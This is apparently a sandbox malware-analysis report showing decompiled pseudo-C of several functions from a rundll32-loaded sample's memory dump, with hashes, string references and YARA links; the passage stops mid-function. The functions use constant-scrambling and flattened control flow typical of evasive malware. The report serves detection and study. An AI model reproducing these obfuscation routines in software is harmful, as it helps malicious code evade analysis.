Function 007C0C14 Relevance: 3.9, Strings: 3, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007C0C14(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t111;
				void* _t115;
				void* _t116;
				signed int _t118;
				void* _t124;
				void* _t125;
				signed int* _t127;

				_t127 =  &_v44;
				_t116 = __ecx;
				_v24 = 0x2b1199;
				_v24 = _v24 + 0x4ba2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xad737bf1;
				_v44 = 0xc9a4fe;
				_v44 = _v44 << 0xe;
				_v44 = _v44 | 0xe69540e1;
				_v44 = _v44 + 0xffffff88;
				_v44 = _v44 ^ 0xefbb2da7;
				_v28 = 0xedc73;
				_v28 = _v28 + 0xffff2701;
				_v28 = _v28 + 0x8bbf;
				_v28 = _v28 ^ 0x00055e2c;
				_v16 = 0xf95115;
				_v16 = _v16 | 0x79ce56df;
				_v16 = _v16 + 0xffff5817;
				_v16 = _v16 ^ 0x79f40a5c;
				_v36 = 0x520750;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x4f263ebd;
				_v36 = _v36 * 6;
				_v36 = _v36 ^ 0x64ef8369;
				_t124 = 0;
				_v40 = 0xccfebc;
				_t125 = 0x2aa38ff;
				_v40 = _v40 + 0xbaf7;
				_t118 = 0xd;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 + 0x6a66;
				_v40 = _v40 ^ 0x4b80704d;
				_v20 = 0xba2b89;
				_v20 = _v20 + 0xa093;
				_v20 = _v20 / _t118;
				_v20 = _v20 ^ 0x000a03fd;
				_v32 = 0xb0f3b0;
				_v32 = _v32 + 0x50dc;
				_v32 = _v32 + 0xffff1629;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0x35b73aee;
				_v4 = 0x432383;
				_v4 = _v4 + 0xffff373f;
				_v4 = _v4 | 0x7532efd9;
				_v4 = _v4 ^ 0x75785e39;
				_v8 = 0x709bec;
				_v8 = _v8 + 0xffffb2bc;
				_v8 = _v8 + 0xffff08e7;
				_v8 = _v8 ^ 0x006dec69;
				_v12 = 0xe79dac;
				_v12 = _v12 * 0x78;
				_v12 = _v12 + 0xb337;
				_v12 = _v12 ^ 0x6c9daebe;
				do {
					while(_t125 != 0x2aa38ff) {
						if(_t125 == 0x81ec960) {
							_t124 = _t124 + E007BC2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
						} else {
							if(_t125 == 0xa7224d4) {
								_t118 = _v16;
								_t111 = E007BC2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
								_t127 =  &(_t127[3]);
								_t125 = 0x81ec960;
								_t124 = _t124 + _t111;
								continue;
							} else {
								if(_t125 != 0xcb4deb0) {
									goto L8;
								} else {
									_push(_t118);
									_push(_t118);
									_t115 = E007A474B();
									_t127 =  &(_t127[2]);
									_t125 = 0xa7224d4;
									_t124 = _t124 + _t115;
									continue;
								}
							}
						}
						L11:
						return _t124;
					}
					_t125 = 0xcb4deb0;
					L8:
				} while (_t125 != 0x4501b46);
				goto L11;
			}

0x007c0c14
0x007c0c1b
0x007c0c1d
0x007c0c27
0x007c0c2f
0x007c0c34
0x007c0c3c
0x007c0c44
0x007c0c49
0x007c0c51
0x007c0c56
0x007c0c5e
0x007c0c66
0x007c0c6e
0x007c0c76
0x007c0c7e
0x007c0c86
0x007c0c8e
0x007c0c96
0x007c0c9e
0x007c0ca6
0x007c0cab
0x007c0cb8
0x007c0cbc
0x007c0cc4
0x007c0cc6
0x007c0cce
0x007c0cd3
0x007c0ce7
0x007c0ce8
0x007c0cec
0x007c0cf4
0x007c0cfc
0x007c0d04
0x007c0d12
0x007c0d16
0x007c0d1e
0x007c0d26
0x007c0d2e
0x007c0d3b
0x007c0d3f
0x007c0d47
0x007c0d4f
0x007c0d57
0x007c0d5f
0x007c0d67
0x007c0d6f
0x007c0d77
0x007c0d7f
0x007c0d87
0x007c0d94
0x007c0d98
0x007c0da0
0x007c0da8
0x007c0da8
0x007c0db6
0x007c0e2e
0x007c0db8
0x007c0dbe
0x007c0df2
0x007c0df6
0x007c0dfb
0x007c0dfe
0x007c0e03
0x00000000
0x007c0dc0
0x007c0dc2
0x00000000
0x007c0dc4
0x007c0dd0
0x007c0dd1
0x007c0dd2
0x007c0dd7
0x007c0dda
0x007c0ddf
0x00000000
0x007c0ddf
0x007c0dc2
0x007c0dbe
0x007c0e30
0x007c0e39
0x007c0e39
0x007c0e07
0x007c0e09
0x007c0e09
0x00000000

Strings

fj, xrefs: 007C0CEC
9^xu, xrefs: 007C0D5F
im, xrefs: 007C0D7F

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9^xu$fj$im
API String ID: 0-3261451082
Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
Instruction ID: b3cb942facb24b1839eada1aa3de9f4b82cbf5858612ff331bfb8021d5794ebe
Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
Instruction Fuzzy Hash: BA5156B2408342DBC784CF25D48984BBBE0BFD8368F505A1DF495A6260D3B5CA49CF97

Uniqueness

Uniqueness Score: -1.00%

Function 007B6C49 Relevance: 3.9, Strings: 3, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E007B6C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v88;
				char _v608;
				void* _t92;
				void* _t96;
				void* _t101;
				void* _t112;
				void* _t113;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t92);
				_v52 = _v52 & 0x00000000;
				_v56 = 0x878462;
				_t113 = _t112 + 0x14;
				_v32 = 0x956791;
				_t101 = 0x1300659;
				_v32 = _v32 + 0xffff68af;
				_v32 = _v32 ^ 0x0094d050;
				_v48 = 0xb6c679;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0662f925;
				_v16 = 0xd9c762;
				_v16 = _v16 << 1;
				_v16 = _v16 | 0xb4c78449;
				_v16 = _v16 ^ 0xb5f30401;
				_v40 = 0x8b331e;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000c5129;
				_v28 = 0x1269f4;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x0007e996;
				_v44 = 0xabd705;
				_v44 = _v44 ^ 0x9c90d177;
				_v44 = _v44 ^ 0x9c3fe788;
				_v8 = 0x357d72;
				_v8 = _v8 + 0xd90c;
				_v8 = _v8 ^ 0xccfdbdcb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x199e890f;
				_v12 = 0x32e6;
				_v12 = _v12 ^ 0x74a35607;
				_v12 = _v12 | 0x704b9008;
				_v12 = _v12 + 0xffff83aa;
				_v12 = _v12 ^ 0x74eee325;
				_v36 = 0xeddfb6;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0xb77b8cf2;
				_v24 = 0xe2b758;
				_v24 = _v24 << 5;
				_v24 = _v24 * 0x38;
				_v24 = _v24 ^ 0x330719f5;
				_v20 = 0x9236d6;
				_v20 = _v20 | 0x3f0523f5;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000835ca;
				do {
					while(_t101 != 0x1300659) {
						if(_t101 == 0xa264c44) {
							_t96 = E007A9D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
							_t113 = _t113 + 0x10;
							_t101 = 0xbcabc0e;
							continue;
						}
						if(_t101 != 0xbcabc0e) {
							goto L8;
						}
						return E007B6637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
					}
					_t96 = E007A4B61( &_v88, _v32, _v48, _v16);
					_t101 = 0xa264c44;
					L8:
				} while (_t101 != 0x478adce);
				return _t96;
			}

0x007b6c55
0x007b6c58
0x007b6c5b
0x007b6c5e
0x007b6c5f
0x007b6c60
0x007b6c65
0x007b6c6e
0x007b6c75
0x007b6c78
0x007b6c7f
0x007b6c81
0x007b6c8d
0x007b6c99
0x007b6ca4
0x007b6ca7
0x007b6cae
0x007b6cb5
0x007b6cb8
0x007b6cbf
0x007b6cc6
0x007b6ccd
0x007b6cd1
0x007b6cd8
0x007b6cdf
0x007b6ce3
0x007b6cea
0x007b6cf1
0x007b6cf8
0x007b6cff
0x007b6d06
0x007b6d0d
0x007b6d14
0x007b6d18
0x007b6d1f
0x007b6d26
0x007b6d2d
0x007b6d34
0x007b6d3b
0x007b6d42
0x007b6d49
0x007b6d4d
0x007b6d54
0x007b6d5b
0x007b6d63
0x007b6d66
0x007b6d6d
0x007b6d74
0x007b6d7b
0x007b6d7f
0x007b6d86
0x007b6d86
0x007b6d8c
0x007b6dcd
0x007b6dd2
0x007b6dd5
0x00000000
0x007b6dd5
0x007b6d90
0x00000000
0x00000000
0x00000000
0x007b6db0
0x007b6de5
0x007b6dec
0x007b6dee
0x007b6dee
0x00000000

Strings

%t, xrefs: 007B6D3B
DL&, xrefs: 007B6C88
r}5, xrefs: 007B6CFF

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %t$DL&$r}5
API String ID: 0-2337153543
Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
Instruction ID: 0e3c572477607a6a0a4420866533d23d87a569d8e84e93646eb3121e58ecdf0e
Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
Instruction Fuzzy Hash: 07410271D0020EEBCF19DFE5D94A4EEBBB1FB48318F208198D51276260D3B94A59CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 1003B8CA

Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2

SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Value$ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 1958600898-0
Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323

Uniqueness

Uniqueness Score: -1.00%

Function 007B1889 Relevance: 2.8, Strings: 2, Instructions: 278
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E007B1889(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				short _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t323;
				signed int _t334;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t386;
				void* _t387;
				signed int* _t390;

				_t390 =  &_v1680;
				_v1568 = 0xdfec4c;
				_t386 = __ecx;
				_v1564 = 0;
				_t387 = 0xea1969c;
				_v1596 = 0xb94d4f;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x002b88ba;
				_v1604 = 0x7820e8;
				_t9 =  &_v1604; // 0x7820e8
				_t337 = 0x3f;
				_v1604 =  *_t9 / _t337;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x0075b154;
				_v1676 = 0xd796f6;
				_v1676 = _v1676 << 7;
				_t338 = 0x1f;
				_v1676 = _v1676 / _t338;
				_v1676 = _v1676 | 0x34dfec15;
				_v1676 = _v1676 ^ 0x37fcd475;
				_v1580 = 0x701ced;
				_t339 = 0x3b;
				_v1580 = _v1580 / _t339;
				_v1580 = _v1580 ^ 0x000eda5b;
				_v1584 = 0x3864f;
				_v1584 = _v1584 | 0xebab6106;
				_v1584 = _v1584 ^ 0xeba3c8dc;
				_v1668 = 0x7d6229;
				_v1668 = _v1668 + 0x90f9;
				_t340 = 0x7d;
				_v1668 = _v1668 * 0xd;
				_v1668 = _v1668 + 0x17d6;
				_v1668 = _v1668 ^ 0x06671cb6;
				_v1652 = 0x8dafad;
				_v1652 = _v1652 + 0xffffa237;
				_v1652 = _v1652 / _t340;
				_v1652 = _v1652 ^ 0xeab94c45;
				_v1652 = _v1652 ^ 0xeabb4144;
				_v1620 = 0x364acf;
				_v1620 = _v1620 + 0xffffd559;
				_v1620 = _v1620 ^ 0x476b0832;
				_v1620 = _v1620 ^ 0x4757dcec;
				_v1660 = 0xdffac8;
				_v1660 = _v1660 | 0xd3f81aab;
				_t341 = 0xd;
				_v1660 = _v1660 / _t341;
				_v1660 = _v1660 + 0x2ca8;
				_v1660 = _v1660 ^ 0x10473906;
				_v1636 = 0xafa95;
				_v1636 = _v1636 | 0x12b9adda;
				_v1636 = _v1636 + 0xca30;
				_t342 = 0x24;
				_v1636 = _v1636 / _t342;
				_v1636 = _v1636 ^ 0x008bc8e6;
				_v1612 = 0xa1b06d;
				_v1612 = _v1612 ^ 0xd927b519;
				_t334 = 0x1c;
				_v1612 = _v1612 / _t334;
				_v1612 = _v1612 ^ 0x07c55aff;
				_v1628 = 0xe475d7;
				_v1628 = _v1628 + 0xf351;
				_v1628 = _v1628 >> 9;
				_v1628 = _v1628 ^ 0x000b149a;
				_v1644 = 0xc98f78;
				_v1644 = _v1644 + 0xa497;
				_v1644 = _v1644 + 0xab0a;
				_v1644 = _v1644 ^ 0x9916dffd;
				_v1644 = _v1644 ^ 0x99d32d23;
				_v1572 = 0xdb2c8b;
				_v1572 = _v1572 ^ 0xa2354bd4;
				_v1572 = _v1572 ^ 0xa2e9b3f6;
				_v1616 = 0x8ac290;
				_v1616 = _v1616 | 0xd6340cba;
				_t343 = 0x17;
				_v1616 = _v1616 / _t343;
				_v1616 = _v1616 ^ 0x095403ec;
				_v1624 = 0xc9b33;
				_v1624 = _v1624 | 0xadec2c36;
				_t344 = 0x23;
				_v1624 = _v1624 / _t344;
				_v1624 = _v1624 ^ 0x04f29945;
				_v1672 = 0xce6284;
				_t345 = 0x1b;
				_v1672 = _v1672 * 0x47;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 | 0xab5418c0;
				_v1672 = _v1672 ^ 0xab589207;
				_v1680 = 0xfb4294;
				_v1680 = _v1680 * 0x56;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 ^ 0x000a896c;
				_v1576 = 0xa0fe48;
				_v1576 = _v1576 / _t345;
				_v1576 = _v1576 ^ 0x000b8e8e;
				_v1608 = 0x915f33;
				_v1608 = _v1608 + 0xfa43;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 ^ 0x000a30cc;
				_v1648 = 0x21b71b;
				_v1648 = _v1648 ^ 0x78ef874e;
				_v1648 = _v1648 | 0x9c246086;
				_v1648 = _v1648 * 0x4a;
				_v1648 = _v1648 ^ 0x1ce73be6;
				_v1592 = 0x926794;
				_v1592 = _v1592 + 0xffff6f6e;
				_v1592 = _v1592 ^ 0x009c0ed2;
				_v1656 = 0x919083;
				_v1656 = _v1656 / _t334;
				_v1656 = _v1656 >> 2;
				_t346 = 0x67;
				_v1656 = _v1656 / _t346;
				_v1656 = _v1656 ^ 0x0003c4fa;
				_v1664 = 0xb12839;
				_v1664 = _v1664 ^ 0xbcb8295e;
				_v1664 = _v1664 + 0xe70b;
				_v1664 = _v1664 + 0xffffbcc9;
				_v1664 = _v1664 ^ 0xbc0a928f;
				_v1600 = 0x37ff42;
				_v1600 = _v1600 + 0xffff03fd;
				_v1600 = _v1600 >> 3;
				_v1600 = _v1600 ^ 0x000f4750;
				_v1632 = 0xbb4856;
				_v1632 = _v1632 * 0x4e;
				_v1632 = _v1632 | 0xf74fdfff;
				_v1632 = _v1632 ^ 0xff54b7ec;
				_v1640 = 0x73c8d7;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 << 0xb;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x005dc3ee;
				_v1588 = 0xe2f656;
				_t323 = _v1588 * 0x57;
				_v1588 = _t323;
				_v1588 = _v1588 ^ 0x4d200bca;
				while(_t387 != 0x5de06da) {
					if(_t387 == 0xea1969c) {
						_t387 = 0xfa9128f;
						continue;
					} else {
						_t395 = _t387 - 0xfa9128f;
						if(_t387 != 0xfa9128f) {
							L8:
							__eflags = _t387 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E007BDA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
							 *((short*)(E007AB6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
							E007A8969(_v1620,  &_v520, _t395, _v1660, _v1636);
							_push(_v1644);
							_push(_v1628);
							E007A47CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E007BDCF7(_v1612, 0x7a1328, _t395),  &_v520, _v1672, _v1680);
							E007AA8B0(_v1576, _t329, _v1608);
							_t346 = _v1648;
							_t323 = E007AEA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
							_t390 =  &(_t390[0x17]);
							if(_t323 != 0) {
								_t387 = 0x5de06da;
								continue;
							}
						}
					}
					return _t323;
				}
				_push(_v1588);
				_push( &_v1560);
				_push(_t346);
				_push(0);
				_push(0);
				_push(_v1640);
				_t346 = _v1600;
				_push(0);
				_t323 = E007AAB87(_t346, _v1632, __eflags);
				_t390 =  &(_t390[7]);
				_t387 = 0xa8e801c;
				goto L8;
			}

0x007b1889
0x007b188f
0x007b18a1
0x007b18a3
0x007b18aa
0x007b18af
0x007b18b7
0x007b18bc
0x007b18c4
0x007b18cc
0x007b18d0
0x007b18d5
0x007b18db
0x007b18e0
0x007b18e8
0x007b18f0
0x007b18f9
0x007b18fe
0x007b1904
0x007b190c
0x007b1914
0x007b1920
0x007b1925
0x007b192b
0x007b1933
0x007b193b
0x007b1943
0x007b194b
0x007b1953
0x007b1960
0x007b1963
0x007b1967
0x007b196f
0x007b1977
0x007b197f
0x007b198f
0x007b1993
0x007b199b
0x007b19a3
0x007b19ab
0x007b19b3
0x007b19bb
0x007b19c3
0x007b19cb
0x007b19d7
0x007b19dc
0x007b19e2
0x007b19ea
0x007b19f2
0x007b19fa
0x007b1a02
0x007b1a0e
0x007b1a11
0x007b1a15
0x007b1a1f
0x007b1a27
0x007b1a35
0x007b1a3a
0x007b1a3e
0x007b1a46
0x007b1a4e
0x007b1a56
0x007b1a5b
0x007b1a63
0x007b1a6b
0x007b1a73
0x007b1a7b
0x007b1a83
0x007b1a8b
0x007b1a93
0x007b1a9b
0x007b1aa3
0x007b1aab
0x007b1ab9
0x007b1abe
0x007b1ac2
0x007b1aca
0x007b1ad2
0x007b1ae0
0x007b1ae5
0x007b1ae9
0x007b1af1
0x007b1b00
0x007b1b01
0x007b1b05
0x007b1b0a
0x007b1b12
0x007b1b1a
0x007b1b27
0x007b1b2b
0x007b1b30
0x007b1b35
0x007b1b3d
0x007b1b4d
0x007b1b51
0x007b1b59
0x007b1b61
0x007b1b69
0x007b1b6e
0x007b1b76
0x007b1b7e
0x007b1b86
0x007b1b93
0x007b1b97
0x007b1b9f
0x007b1ba7
0x007b1baf
0x007b1bb7
0x007b1bc5
0x007b1bc9
0x007b1bd6
0x007b1bde
0x007b1be2
0x007b1bea
0x007b1bf2
0x007b1bfa
0x007b1c02
0x007b1c0a
0x007b1c12
0x007b1c1a
0x007b1c22
0x007b1c27
0x007b1c2f
0x007b1c3c
0x007b1c40
0x007b1c48
0x007b1c50
0x007b1c5d
0x007b1c61
0x007b1c66
0x007b1c6b
0x007b1c73
0x007b1c7b
0x007b1c80
0x007b1c84
0x007b1c8c
0x007b1c9a
0x007b1d93
0x00000000
0x007b1ca0
0x007b1ca0
0x007b1ca6
0x007b1dc6
0x007b1dc6
0x007b1dcc
0x00000000
0x00000000
0x007b1cac
0x007b1cc5
0x007b1cf6
0x007b1cfd
0x007b1d02
0x007b1d0b
0x007b1d4c
0x007b1d5e
0x007b1d7c
0x007b1d80
0x007b1d85
0x007b1d8a
0x007b1d8c
0x00000000
0x007b1d8c
0x007b1d8a
0x007b1ca6
0x007b1ddc
0x007b1ddc
0x007b1d9d
0x007b1da8
0x007b1da9
0x007b1daa
0x007b1dab
0x007b1dac
0x007b1db4
0x007b1db8
0x007b1db9
0x007b1dbe
0x007b1dc1
0x00000000

Strings

x, xrefs: 007B18CC
)b}, xrefs: 007B194B

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )b}$ x
API String ID: 0-2724122486
Opcode ID: adc72d8b44779ef70751ce1da4011c90c0d65c0c64b6d093c1f8dc9586074c11
Instruction ID: 19ec386ee4bbb6d6cf08fb82b9e754e9814feffa3e7b4b50906dd23d7505a73b
Opcode Fuzzy Hash: adc72d8b44779ef70751ce1da4011c90c0d65c0c64b6d093c1f8dc9586074c11
Instruction Fuzzy Hash: 75D1307150C3819FE368CF20C48A95BFBE2FBC5358F508A2DF29996260D7B58949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 007B473C Relevance: 2.7, Strings: 2, Instructions: 233
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E007B473C() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				void* _t225;
				void* _t246;
				intOrPtr _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr* _t259;
				signed int _t260;
				signed int* _t261;

				_t261 =  &_v100;
				_v12 = 0xf244e3;
				_v8 = 0x291d6d;
				_t225 = 0x37f2dd7;
				_t251 = 0;
				_v4 = 0;
				_v68 = 0x555e8d;
				_v68 = _v68 + 0xfffff532;
				_v68 = _v68 | 0x235b50f0;
				_v68 = _v68 ^ 0x235e53ff;
				_v84 = 0xf72ec;
				_v84 = _v84 >> 7;
				_t252 = 0x19;
				_v84 = _v84 / _t252;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x000f09df;
				_v20 = 0xee8389;
				_t253 = 0x51;
				_v20 = _v20 * 0x29;
				_v20 = _v20 ^ 0x2635dc09;
				_v88 = 0xea545e;
				_t30 =  &_v88; // 0xea545e
				_v88 =  *_t30 / _t253;
				_t36 =  &_v88; // 0xea545e
				_t254 = 0x7a;
				_v88 =  *_t36 * 0x1c;
				_v88 = _v88 + 0xc9a8;
				_v88 = _v88 ^ 0x005db592;
				_v24 = 0x448750;
				_v24 = _v24 / _t254;
				_v24 = _v24 ^ 0x000cab3c;
				_v28 = 0x8cea36;
				_v28 = _v28 * 0x38;
				_v28 = _v28 ^ 0x1eda9ad9;
				_v100 = 0x8110ba;
				_v100 = _v100 + 0x3ab9;
				_v100 = _v100 ^ 0x336ca884;
				_v100 = _v100 + 0xffff8c66;
				_v100 = _v100 ^ 0x33e0711c;
				_v64 = 0x5ca85e;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x000b11ab;
				_v44 = 0x2bb2b6;
				_v44 = _v44 | 0xbbfbcd5f;
				_v44 = _v44 ^ 0xbbf16182;
				_v72 = 0x855f4c;
				_v72 = _v72 ^ 0x87656771;
				_v72 = _v72 * 0x71;
				_v72 = _v72 ^ 0xf9f8e59a;
				_v96 = 0x938339;
				_v96 = _v96 << 8;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xcc040e17;
				_v96 = _v96 ^ 0x50841052;
				_v40 = 0xbe1d32;
				_v40 = _v40 + 0x9b9c;
				_v40 = _v40 ^ 0x00bc2d0e;
				_v56 = 0x9e5686;
				_v56 = _v56 + 0xffffd134;
				_v56 = _v56 + 0xffff1440;
				_v56 = _v56 ^ 0x0091c9b6;
				_v60 = 0xb7e614;
				_v60 = _v60 << 3;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00065aea;
				_v32 = 0x537989;
				_v32 = _v32 + 0xffff7fce;
				_v32 = _v32 ^ 0x005430a6;
				_v92 = 0x1586eb;
				_t255 = 0x27;
				_v92 = _v92 * 0x18;
				_v92 = _v92 >> 7;
				_v92 = _v92 * 0x26;
				_v92 = _v92 ^ 0x009f543a;
				_v52 = 0xc32f0b;
				_v52 = _v52 | 0xcd8d244f;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0cd427c3;
				_v36 = 0xd9cf6a;
				_v36 = _v36 / _t255;
				_v36 = _v36 ^ 0x000f5a1a;
				_v16 = 0xbb623f;
				_v16 = _v16 ^ 0xe760556d;
				_v16 = _v16 ^ 0xe7dfff62;
				_v76 = 0x7fa35c;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 + 0xffff049d;
				_v76 = _v76 ^ 0x38c60922;
				_v76 = _v76 ^ 0xc73f93c8;
				_v80 = 0x34ea16;
				_v80 = _v80 | 0x70dfffff;
				_t256 = 0x78;
				_t257 = _v16;
				_t260 = _v16;
				_t224 = _v16;
				_v80 = _v80 / _t256;
				_v80 = _v80 ^ 0x00f0b2be;
				_v48 = 0x2ab377;
				_v48 = _v48 << 0xd;
				_v48 = _v48 + 0x21bb;
				_v48 = _v48 ^ 0x5663e2ae;
				while(1) {
					L1:
					_push(0x5c);
					while(_t225 != 0xb8820d) {
						if(_t225 == 0x1effdba) {
							_t219 = E007A912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
							_t224 = _t219;
							_t261 =  &(_t261[5]);
							if(_t219 != 0) {
								_t225 = 0xb9a00d9;
								goto L11;
							}
						} else {
							if(_t225 == 0x37f2dd7) {
								_t225 = 0x43cb3ac;
								continue;
							} else {
								if(_t225 == 0x43cb3ac) {
									_t258 =  *0x7c3e10; // 0x0
									_t259 = _t258 + 0x1c;
									while( *_t259 != _t246) {
										_t259 = _t259 + 2;
									}
									_t257 = _t259 + 2;
									_t225 = 0x1effdba;
									goto L12;
								} else {
									if(_t225 == 0x5d9bea5) {
										E007B8F9E(_v32, _v92, _v52, _v36, _t260);
										_t261 =  &(_t261[3]);
										_t225 = 0xb8820d;
										goto L11;
									} else {
										if(_t225 == _t218) {
											E007AE249(_v96, _t260, _v40, _v56, _v60);
											_t261 =  &(_t261[3]);
											_t251 =  !=  ? 1 : _t251;
